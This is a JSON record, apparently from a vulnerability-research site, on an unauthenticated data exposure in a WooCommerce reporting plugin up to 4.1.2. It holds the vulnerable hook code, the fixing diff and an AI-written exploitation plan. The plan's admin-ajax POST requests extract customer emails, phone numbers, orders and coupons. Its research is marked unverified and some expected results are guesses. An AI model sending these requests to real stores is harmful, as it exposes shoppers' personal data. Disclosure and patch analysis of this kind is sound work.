[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f5sKR41N2lqR-kUqRNVSVQF5aNxSM7IzGfJQCvOcbFUA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":30,"research_vulnerable_code":31,"research_fix_diff":32,"research_exploit_outline":33,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":37},"CVE-2026-24992","advanced-woocommerce-product-sales-reporting-unauthenticated-information-exposure","Advanced WooCommerce Product Sales Reporting \u003C= 4.1.2 - Unauthenticated Information Exposure","The Advanced WooCommerce Product Sales Reporting – Statistics & Forecast plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.1.2. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.","webd-woocommerce-advanced-reporting-statistics",null,"\u003C=4.1.2","4.1.3","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-01-23 00:00:00","2026-02-02 21:02:08",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F86d01f1b-f1f3-4d28-8fd9-6f17d610a38c?source=api-prod",11,[22,23,24,25],"helper-class.php","langs\u002Fwebd-woocommerce-reporting-statistics.pot","readme.txt","webd-woocommerce-reporting-statistics.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-24992\n\n## 1. Vulnerability Summary\nThe **Advanced WooCommerce Product Sales Reporting** plugin (up to version 4.1.2) is vulnerable to **Unauthenticated Information Exposure**. The plugin registers several AJAX handlers for generating reports (customers, orders, countries, etc.) using the `wp_ajax_nopriv_` hook. This makes these endpoints accessible to unauthenticated users. Furthermore, the handler functions in `OrderProcessorHelp` do not implement capability checks (`current_user_can`) or nonce verification, allowing any remote actor to extract sensitive customer lists, order histories, and sales data.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `get_customers` (or `get_orders`, `get_coupons`)\n- **HTTP Method**: `POST`\n- **Authentication**: None (Unauthenticated)\n- **Preconditions**:\n - The plugin must be active.\n - WooCommerce must be installed and contain customer or order data.\n- **Vulnerable Hook**: `wp_ajax_nopriv_get_customers` (and others defined in `helper-class.php`).\n\n## 3. Code Flow\n1. **Entry Point**: An unauthenticated user sends a `POST` request to `admin-ajax.php` with `action=get_customers`.\n2. **Hook Registration**: In `helper-class.php`, the `OrderProcessorHelp::__construct()` method registers the hook:\n ```php\n add_action( 'wp_ajax_get_customers', array( $this,'get_customers' ) );\n add_action( 'wp_ajax_nopriv_get_customers', array( $this,'get_customers' ) );\n ```\n3. **Handler Execution**: WordPress executes `OrderProcessorHelp::get_customers()`.\n4. **Missing Protection**: The `get_customers` function (and others like `get_orders`) fails to call `check_ajax_referer()` or `current_user_can( 'manage_woocommerce' )`.\n5. **Data Sink**: The function queries the WooCommerce database (specifically the customer lookup tables or `wp_users`\u002F`wp_usermeta`) and returns a JSON-encoded list of customer details including names, emails, and phone numbers.\n\n## 4. Nonce Acquisition Strategy\n**No nonce is required.**\nAnalysis of the `webdWoocommerceReportingStatistics::BackEndScripts()` function in `webd-woocommerce-reporting-statistics.php` shows the `wp_localize_script` call for the `webdWoocommerceReportingStatistics` object:\n```php\nwp_localize_script(\n \"webd-woocommerce-reporting-statistics\".\"adminJs\",\n \"webdWoocommerceReportingStatistics\",\n array(\n 'thispluginpage' => admin_url(\"\u002Fadmin.php?page=\".$this->slug),\n 'url' => admin_url( 'admin-ajax.php' ),\n 'plugin_url' => plugins_url( '', __FILE__ ),\n 'ajax_url' => admin_url( 'admin-ajax.php' ),\n 'siteUrl' => site_url(),\n 'plugin_wrapper' => \"webd-woocommerce-reporting-statistics\",\n \u002F\u002F ... (No nonce parameter present)\n )\n);\n```\nFurthermore, the `nopriv_` registration indicates the endpoints were erroneously exposed to public access. The handlers in `helper-class.php` are expected to process the request directly.\n\n## 5. Exploitation Strategy\n\n### Step 1: Extract Customer List (PII Exposure)\nThis request targets the customer report data.\n\n- **URL**: `{{BASE_URL}}\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: `POST`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**: `action=get_customers`\n\n### Step 2: Extract Order Details\nThis request targets the order history, which may contain transaction IDs and specific product interests.\n\n- **URL**: `{{BASE_URL}}\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: `POST`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**: `action=get_orders`\n\n### Step 3: Extract Reporting Statistics\nThis request targets overall sales metrics.\n\n- **URL**: `{{BASE_URL}}\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: `POST`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**: `action=display_orders_by_period&tab=months`\n\n## 6. Test Data Setup\n1. **Install WooCommerce**: Ensure WooCommerce is active.\n2. **Create a Customer**:\n ```bash\n wp user create victim victim@example.com --role=customer --user_pass=password123 --first_name=\"Victim\" --last_name=\"User\"\n ```\n3. **Create an Order**: Use WC CLI to create a sample order for the customer.\n ```bash\n wp wc shop_order create --customer_id=2 --status=completed --set_paid=true\n ```\n4. **Configure Plugin**: The plugin uses default settings upon activation in `onActivation()`. No further configuration is needed.\n\n## 7. Expected Results\n- **Success Criteria**: The HTTP response should be `200 OK` and contain a JSON array or object.\n- **Data Exposed**: For `action=get_customers`, the response should contain PII fields such as:\n - `billing_email`\n - `billing_phone`\n - `first_name` \u002F `last_name`\n - `city` \u002F `country`\n- **Format**: Likely a JSON list compatible with DataTables (e.g., `{\"data\": [...], \"recordsTotal\": ...}`).\n\n## 8. Verification Steps\nAfter performing the HTTP request:\n1. Verify the leaked data matches the database records:\n ```bash\n wp user list --role=customer --fields=user_email,display_name\n ```\n2. Compare the email addresses in the AJAX response with the output of the `wp user list` command. If they match, information exposure is confirmed.\n\n## 9. Alternative Approaches\nIf `get_customers` does not return data directly (e.g., if it requires pagination parameters), attempt adding standard DataTables parameters:\n- **Body**: `action=get_customers&start=0&length=10&draw=1`\n\nIf `get_customers` is restricted by specific environment settings, attempt:\n- **Action**: `get_coupons` (Exposes discount codes and usage limits).\n- **Action**: `get_payments` (Exposes payment gateway configuration names and transaction volumes).","The plugin incorrectly exposes several AJAX endpoints intended for administrative reporting to unauthenticated users by registering them with the 'wp_ajax_nopriv_' hook. Due to a lack of capability checks and nonce verification within the handler functions, attackers can extract sensitive WooCommerce information, including customer PII, order histories, and sales statistics.","\u002F\u002F helper-class.php line 104\npublic function __construct() {\n\n add_action( 'wp_ajax_getOrders', array( $this,'getOrders' ) );\n add_action( 'wp_ajax_nopriv_getOrders', array( $this,'getOrders' ) );\n\n add_action( 'wp_ajax_get_orders', array( $this,'get_orders' ) );\n add_action( 'wp_ajax_nopriv_get_orders', array( $this,'get_orders' ) );\n\n add_action( 'wp_ajax_get_customers', array( $this,'get_customers' ) );\n add_action( 'wp_ajax_nopriv_get_customers', array( $this,'get_customers' ) );\n\n add_action( 'wp_ajax_get_countries', array( $this,'get_countries' ) );\n add_action( 'wp_ajax_nopriv_get_countries', array( $this,'get_countries' ) );\n\n add_action( 'wp_ajax_get_payments', array( $this,'get_payments' ) );\n add_action( 'wp_ajax_nopriv_get_payments', array( $this,'get_payments' ) );\n\n add_action( 'wp_ajax_get_coupons', array( $this,'get_coupons' ) );\n add_action( 'wp_ajax_nopriv_get_coupons', array( $this,'get_coupons' ) );\n\n add_action( 'wp_ajax_get_products', array( $this,'get_products' ) );\n add_action( 'wp_ajax_nopriv_get_products', array( $this,'get_products' ) );\n\n add_action( 'wp_ajax_get_categories', array( $this,'get_categories' ) );\n add_action( 'wp_ajax_nopriv_get_categories', array( $this,'get_categories' ) );\n\n add_action( 'wp_ajax_display_orders_by_period', array( $this,'display_orders_by_period' ) );\n add_action( 'wp_ajax_nopriv_display_orders_by_period', array( $this,'display_orders_by_period' ) );\n\n}\n\n---\n\n\u002F\u002F helper-class.php line 833\npublic function get_customers() {\n\n if (\n is_admin() &&\n (\n isset( $_POST['action'] ) &&\n 'get_customers' === $_POST['action']\n )\n ) {\n \u002F\u002F ... queries database and returns data directly without capability check","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwebd-woocommerce-advanced-reporting-statistics\u002F4.1.2\u002Fhelper-class.php\t2025-12-26 20:31:00.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwebd-woocommerce-advanced-reporting-statistics\u002F4.1.3\u002Fhelper-class.php\t2026-01-14 14:34:08.000000000 +0000\n@@ -101,36 +101,19 @@\n \n \t\u002F**\n \t * Constructor.\n+\t *\n+\t * @version 4.1.3\n \t *\u002F\n \tpublic function __construct() {\n-\n-\t\tadd_action( 'wp_ajax_getOrders', array( $this,'getOrders' ) );\n-\t\tadd_action( 'wp_ajax_nopriv_getOrders', array( $this,'getOrders' ) );\n-\n-\t\tadd_action( 'wp_ajax_get_orders', array( $this,'get_orders' ) );\n-\t\tadd_action( 'wp_ajax_nopriv_get_orders', array( $this,'get_orders' ) );\n-\n-\t\tadd_action( 'wp_ajax_get_customers', array( $this,'get_customers' ) );\n-\t\tadd_action( 'wp_ajax_nopriv_get_customers', array( $this,'get_customers' ) );\n-\n-\t\tadd_action( 'wp_ajax_get_countries', array( $this,'get_countries' ) );\n-\t\tadd_action( 'wp_ajax_nopriv_get_countries', array( $this,'get_countries' ) );\n-\n-\t\tadd_action( 'wp_ajax_get_payments', array( $this,'get_payments' ) );\n-\t\tadd_action( 'wp_ajax_nopriv_get_payments', array( $this,'get_payments' ) );\n-\n-\t\tadd_action( 'wp_ajax_get_coupons', array( $this,'get_coupons' ) );\n-\t\tadd_action( 'wp_ajax_nopriv_get_coupons', array( $this,'get_coupons' ) );\n-\n-\t\tadd_action( 'wp_ajax_get_products', array( $this,'get_products' ) );\n-\t\tadd_action( 'wp_ajax_nopriv_get_products', array( $this,'get_products' ) );\n-\n-\t\tadd_action( 'wp_ajax_get_categories', array( $this,'get_categories' ) );\n-\t\tadd_action( 'wp_ajax_nopriv_get_categories', array( $this,'get_categories' ) );\n-\n-\t\tadd_action( 'wp_ajax_display_orders_by_period', array( $this,'display_orders_by_period' ) );\n-\t\tadd_action( 'wp_ajax_nopriv_display_orders_by_period', array( $this,'display_orders_by_period' ) );\n-\n+\t\tadd_action( 'wp_ajax_getOrders', array( $this,'getOrders' ) );\n+\t\tadd_action( 'wp_ajax_get_orders', array( $this,'get_orders' ) );\n+\t\tadd_action( 'wp_ajax_get_customers', array( $this,'get_customers' ) );\n+\t\tadd_action( 'wp_ajax_get_countries', array( $this,'get_countries' ) );\n+\t\tadd_action( 'wp_ajax_get_payments', array( $this,'get_payments' ) );\n+\t\tadd_action( 'wp_ajax_get_coupons', array( $this,'get_coupons' ) );\n+\t\tadd_action( 'wp_ajax_get_products', array( $this,'get_products' ) );\n+\t\tadd_action( 'wp_ajax_get_categories', array( $this,'get_categories' ) );\n+\t\tadd_action( 'wp_ajax_display_orders_by_period', array( $this,'display_orders_by_period' ) );\n \t}\n \n \t\u002F**\n@@ -183,7 +166,8 @@\n \n \t\tif (\n \t\t\t'POST' === $_SERVER['REQUEST_METHOD'] &&\n-\t\t\t'display_orders_by_period' === $_POST['action']\n+\t\t\t'display_orders_by_period' === $_POST['action'] &&\n+\t\t\tcurrent_user_can( 'manage_woocommerce' )\n \t\t) {","The exploit targets the `\u002Fwp-admin\u002Fadmin-ajax.php` endpoint. An unauthenticated attacker sends a POST request with the 'action' parameter set to 'get_customers' (to leak PII), 'get_orders' (to leak transaction history), or 'get_coupons' (to leak discount data). Because the plugin registers these actions via wp_ajax_nopriv_ and the handler functions lack current_user_can() checks, the server will process the request and return the sensitive data in a JSON format without requiring any authentication or nonces.","gemini-3-flash-preview","2026-05-05 02:07:14","2026-05-05 02:07:44",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","4.1.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwebd-woocommerce-advanced-reporting-statistics\u002Ftags\u002F4.1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwebd-woocommerce-advanced-reporting-statistics.4.1.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwebd-woocommerce-advanced-reporting-statistics\u002Ftags\u002F4.1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwebd-woocommerce-advanced-reporting-statistics.4.1.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwebd-woocommerce-advanced-reporting-statistics\u002Ftags"]